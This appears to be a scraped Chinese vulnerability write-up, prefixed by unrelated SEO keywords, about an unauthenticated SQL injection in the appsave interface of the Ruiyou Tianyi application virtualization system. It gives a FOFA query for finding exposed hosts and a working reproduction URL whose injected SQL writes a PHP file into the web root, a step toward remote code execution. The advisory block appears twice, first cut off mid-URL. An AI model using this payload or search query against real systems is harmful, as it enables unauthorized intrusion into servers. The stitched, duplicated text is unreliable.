win7如何安装iis来浏览asp网站,中天建设集团有限公司山东分公司,企业网络规划和设计方案,网络规划与设计方案0x01 产品简介
N/A
0x02 漏洞概述
瑞友天翼应用虚拟化系统 appsave接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞执行任意sql语句。
0x03 测绘语句
fofa: body=瑞友天翼 - 应用虚拟化系统
0x04 漏洞复现 1、执行sql语句:http://xxxx/hmrao.php?s=/Ad…0x01 产品简介
N/A
0x02 漏洞概述
瑞友天翼应用虚拟化系统 appsave接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞执行任意sql语句。
0x03 测绘语句
fofa: body="瑞友天翼 - 应用虚拟化系统"
0x04 漏洞复现 1、执行sql语句:http://xxxx/hmrao.php?s=/Admin/appsaveappid=11111111%27);select+%27%3C%3fphp+echo+md5(11111111)%3f%3E%27+into+dumpfile+%27../../WebRoot/11122222.php%27%3b--+/
